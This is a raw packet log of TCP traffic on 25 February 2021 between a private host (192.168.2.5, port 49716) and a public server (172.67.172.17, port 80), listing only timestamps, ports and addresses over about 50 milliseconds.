Feb 25, 2021 11:04:07.762470007 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762487888 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762504101 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762518883 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762531996 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.762535095 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762552977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762563944 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.762571096 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762587070 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762597084 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.762607098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762624979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762624979 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.762640953 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762651920 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.762656927 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762671947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.762700081 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.762734890 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.763422966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763452053 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763463020 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763478994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763490915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763506889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763521910 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763525963 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.763539076 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763554096 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.763555050 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763573885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763578892 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.763591051 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763606071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763622046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763632059 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.763638020 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.763664961 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.763688087 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.764394045 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764424086 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764436960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764452934 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764468908 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764484882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764489889 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.764501095 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764519930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764528990 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.764539003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764542103 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.764554977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764561892 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.764571905 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764588118 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764602900 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764605045 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.764619112 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.764656067 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.764662981 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.765369892 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765419960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765431881 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765444994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765463114 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765472889 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.765479088 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765489101 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.765495062 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765510082 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765516043 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.765528917 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765543938 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.765546083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765561104 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765575886 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765590906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765598059 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.765605927 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.765630960 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.765652895 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766340971 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766359091 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766381025 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766397953 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766413927 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766415119 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766432047 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766439915 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766463995 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766762972 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766784906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766801119 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766819000 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766834974 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766850948 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766853094 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766868114 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766875982 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766891003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766902924 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766908884 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766923904 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766940117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766954899 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766956091 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766971111 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.766993999 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.766993999 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767045975 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.767735004 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767767906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767780066 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767796040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767812967 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767828941 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767839909 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.767848015 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767865896 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767882109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767891884 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.767898083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767914057 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767926931 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.767927885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767945051 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767950058 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.767960072 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.767976999 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.768002033 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.768744946 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768769979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768785954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768800974 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768812895 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.768822908 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768842936 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768851995 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.768860102 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768891096 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.768894911 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768914938 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768932104 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768946886 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768949986 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.768963099 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768978119 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.768979073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.768992901 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.769020081 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.769046068 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.769720078 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.769743919 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.769759893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.769779921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.769794941 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.769797087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.769813061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.769815922 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.769871950 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.770077944 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770109892 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770127058 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770143032 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770155907 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770165920 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.770172119 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770189047 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770205021 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770211935 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.770220995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770236969 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770247936 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.770256996 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770273924 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.770277023 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770293951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770311117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.770328045 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.770349026 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.771050930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771081924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771095037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771111965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771126986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771131039 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.771142960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771153927 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.771158934 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771178007 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771178961 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.771195889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771210909 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771225929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771235943 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.771241903 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771256924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771270037 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.771272898 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.771296978 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.771317005 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.772022009 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772051096 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772069931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772087097 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772103071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772110939 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.772119045 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772134066 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772149086 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772156000 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.772166014 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772181988 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772192955 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.772200108 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772217989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772222042 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.772233963 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772248983 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.772273064 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.772305012 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.772985935 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773017883 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773036003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773051023 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773061037 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773072958 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773081064 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773086071 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773117065 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773415089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773436069 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773452997 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773468018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773483038 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773487091 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773500919 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773504972 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773520947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773536921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773551941 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773560047 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773569107 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773585081 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773593903 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773601055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773618937 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773619890 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773638010 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.773638964 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.773688078 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.774398088 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774427891 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774446964 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774465084 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774480104 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774490118 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.774497032 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774506092 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.774513006 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774528980 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774544001 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774555922 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.774559021 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774579048 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774589062 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.774596930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774611950 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774612904 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.774627924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.774646997 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.774679899 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.775350094 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775374889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775388002 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775407076 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775423050 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775438070 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775450945 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.775453091 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775469065 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775477886 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.775484085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775504112 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775504112 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.775521040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775536060 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775552034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775559902 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.775567055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.775589943 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.775619984 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.776339054 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.776365995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.776381969 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.776397943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.776405096 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.776418924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.776437044 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.776437044 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.776489973 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.811969042 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.811979055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812012911 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812028885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812043905 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812057018 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812060118 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812076092 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812078953 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812092066 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812100887 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812108040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812123060 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812127113 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812144995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812161922 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812201023 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812246084 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812333107 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812341928 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812359095 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812374115 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812391996 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812400103 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812414885 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812421083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812438965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812454939 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812458038 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812472105 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812488079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812504053 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812520981 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812522888 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812536001 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812553883 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.812561989 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.812594891 CET	49716	80	192.168.2.5	172.67.172.17
